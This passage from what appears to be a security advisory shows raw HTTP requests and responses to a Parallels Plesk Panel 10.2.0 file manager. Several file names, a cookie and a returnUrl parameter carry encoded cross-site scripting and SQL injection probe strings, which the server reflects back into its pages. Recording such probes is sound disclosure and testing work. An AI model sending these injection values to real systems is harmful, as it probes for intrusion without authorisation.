&quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_6c91d8a7d6d" value="6c91d8a7d6d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=6c91d8a7d6d" onClick="return bin();;lon();">6c91d8a7d6d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/6c91d8a7d6d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=6c91d8a7d6d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F6c91d8a7d6d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=6c91d8a7d6d" 
onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_73dd0%2522%2520a%253db%25202d0878db96d" value="73dd0%2522%2520a%253db%25202d0878db96d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onClick="return bin();;lon();">73dd0%2522%2520a%253db%25202d0878db96d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/73dd0%2522%2520a%253db%25202d0878db96d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A 
href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F73dd0%252522%252520a%25253db%2525202d0878db96d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_7b286%2522%253e%253ca%253ef79f4c51d2e" value="7b286%2522%253e%253ca%253ef79f4c51d2e" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick="return bin();;lon();">7b286%2522%253e%253ca%253ef79f4c51d2e</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/7b286%2522%253e%253ca%253ef79f4c51d2e" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG 
src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr></table><div class="paging pagingBottom"><table width="100%"><tr><td>1-25 <A href="/plesk/client@2/domain@1/hosting/file-manager/create-file/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/create-file/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a> items of 44 total</td><td align="center">Pages:&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">First</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">&lt;&lt;</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">1</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">2</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return 
false;;lon();">&gt;&gt;</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">Last</a></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><script>SetCookie("filelist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function FileListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function FileListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function FileListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function FileListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.FileListSelectAll.checked;
                           FileListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function FileListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function FileListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function FileListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   FileListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListSearchShow()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function FileListSearchHide()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function FileListRemove(f)
           {
               if (0 == FileListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-file/";
               lsubmit(f);
               return false;
           }
       </script>

   </td></tr></table></fieldset>

   <div class="footnote"></div>
</div>

<input type="hidden" name="file" value="">
<input type="hidden" name="subcmd" value="">

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

Request 2

GET /plesk/client@2/domain@1/hosting/file-manager/create-file/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; advancedPanel-hidden=0; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard%2527%2527; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; no_frames=deleted;

Response 2

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:36:30 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:36:32 GMT
Connection: close
Content-Length: 93592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->

<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fftp-users%252F%2Froot%27%2520and%25201%253d2--%2520%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fweb-users%252F%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fanonymous-ftp%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>File Manager</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/filemanager/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/hosting/file-manager/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;


           function update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "update";
               lsubmit(f);

               return false;
           }

           function chmod_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "chmod";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function rename_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "rename";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function new_file_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_file";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-file/"
               lsubmit(f);

               return false;
           }

           function count_size_oC()
           {
               f = document.forms[0];
               f.cmd.value = "count_size";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function extract_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "extract";
               f.subcmd.value = "";
               lsubmit(f);
               return false;
           }

           function pack_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/pack/"
               lsubmit(f);

               return false;
           }

           function create_archive_oC() {
               f = document.forms[0];

               if ("" == f.archive_name.value) {
                   alert("Please enter file name.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "pack";
               lsubmit(f);

               return false;
           }

           function new_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_dir";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-dir/"
               lsubmit(f);

               return false;
           }

           function create_file_oC()
           {
               f = document.forms[0];
errorfield(f.new_file, false);

               if (f.create_file_method[0].checked) { // upload
                   f.cmd.value = "upload_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               if (f.create_file_method[1].checked) { // create
                   if (f.new_file.value == "") {
        errorfield(f.new_file, true);
                       alert("Some fields are empty or contain an improper value.");
                       f.new_file.focus();
                       return false;
                   }

                   f.cmd.value = "create_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               return false;
           }

           function create_file_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_file";
               f.subcmd.value = "save";
               lsubmit(f);

               return false;
           }

           function create_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_dir";
               f.file.value = f.new_dir.value;
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function edit_reset_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "";
               f.reset();
               return false;
           }

           function edit_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save";
               lsubmit(f);
               return false;
           }

           function edit_save_exit_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save_exit";
               lsubmit(f);
               return false;
           }

           function codepage_oC()
           {
               f = document.forms[0];
               f.subcmd.value = "codepage";
               lsubmit(f);
               return false;
           }

           function cancel_oC()
           {
               f = document.forms[0];
               f.cmd.value = "";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/"
               lsubmit(f);
               return false;
           }

           function touch_oC()
           {
               f = document.forms[0];

               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               if (!confirm("Are you sure you want to change the timestamp of the selected files?"))
                   return false;

               f.cmd.value="touch";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function copy_move_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="copy_move";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/copy-move/"
               lsubmit(f);

               return false;
           }

           function copy_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "copy";
               lsubmit(f);

               return false;
           }

           function move_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "move";
               lsubmit(f);

               return false;
           }

           function remove_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/remove/"
               lsubmit(f);

               return false;
           }

           function remove_submit_oC()
           {
               f = document.forms[0];
               if (!f.confirm.checked) {
                   alert("You must confirm deletion.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function check_selection()
           {
               f = document.forms[0];
               selected = 0;
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]") && f.elements[i].checked) {
                       selected++;
                   }
               }
               return selected;
           }

           function perm_click(t, id) {
               el = document.forms[0].elements;
               switch (t) {
               case "ra":
                   if (el["ra_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["wa_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "rd":
                   if (el["rd_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["wd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "wa":
                   if (el["wa_perm[" + id + "]"].checked) {
                       el["wd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "wd":
                   if (el["wd_perm[" + id + "]"].checked) {
                       el["wa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "xa":
                   if (el["xa_perm[" + id + "]"].checked) {
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["wa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "xd":
                   if (el["xd_perm[" + id + "]"].checked) {
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["wd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "fa":
                   if (el["fa_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = true;
                       el["wa_perm[" + id + "]"].checked = true;
                       el["xa_perm[" + id + "]"].checked = true;
                       el["rd_perm[" + id + "]"].checked = false;
                       el["wd_perm[" + id + "]"].checked = false;
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                   }
                   break;
               case "fd":
                   if (el["fd_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = true;
                       el["wd_perm[" + id + "]"].checked = true;
                       el["xd_perm[" + id + "]"].checked = true;
                       el["ra_perm[" + id + "]"].checked = false;
                       el["wa_perm[" + id + "]"].checked = false;
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                   }
                   break;

               }
           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/file-manager/create-file/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   


